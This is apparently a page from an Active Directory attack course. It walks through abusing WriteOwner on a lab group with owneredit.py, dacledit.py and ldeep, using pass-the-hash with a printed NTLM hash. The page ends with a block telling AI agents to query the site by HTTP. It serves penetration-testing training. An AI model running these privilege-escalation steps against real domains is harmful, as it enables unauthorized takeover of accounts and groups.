# WriteOwner on Group (EmpireState -> CentralPark)

* Now with the writeOwner privilege we can change the owner of CentralPark to own the group
* Just like before we will use the impacket [fork](https://github.com/ThePorgs/impacket)

<figure><img src="/files/ML5MKU0xlXioMAhBLQMV" alt=""><figcaption></figcaption></figure>

```
ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'
```

### Read The Owner Permission

```
owneredit.py -action read -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro
```

### Edit The Owner Permission

We are going to give Nicolas maduro owner access to CentralPark Group!

```
owneredit.py -action write -owner 'Nicolas.Maduro' -target 'CentralPark' -hashes ':b3b3717f7d51b37fb325f7e7d048e998' NewYork.local/Nicolas.Maduro

```

* And the owner of CentralPark group is now Nicolas.Maduro
* As owner of the group we can now change the acl and give us GenericAll on the group

```
dacledit.py -action 'write' -rights 'FullControl' -principal Nicolas.Maduro  -target 'CentralPark' 'NewYork.local'/'Nicolas.Maduro' -hashes ':b3b3717f7d51b37fb325f7e7d048e998'
```

<figure><img src="/files/TmsLVAxxMPWFNMZXQJgl" alt=""><figcaption></figcaption></figure>

* With GenericAll now we can add Nicolas to the CentrlalPark group

```
ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 add_to_group "CN=Nicolas.Maduro,OU=SugarHill,DC=NewYork,DC=local" "CN=CentralPark,OU=WestSide,DC=NewYork,DC=local"
```

#### See Nicolas.Maduro is part of the group now!

```
ldeep ldap -u Nicolas.Maduro -H ':b3b3717f7d51b37fb325f7e7d048e998' -d NewYork.local -s ldap://192.168.56.10 membersof 'CentralPark'
```

<figure><img src="/files/1S05nFB4clnEMkWDsvId" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/user-acl-exploits/writeowner-on-group-empirestate-greater-than-centralpark.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.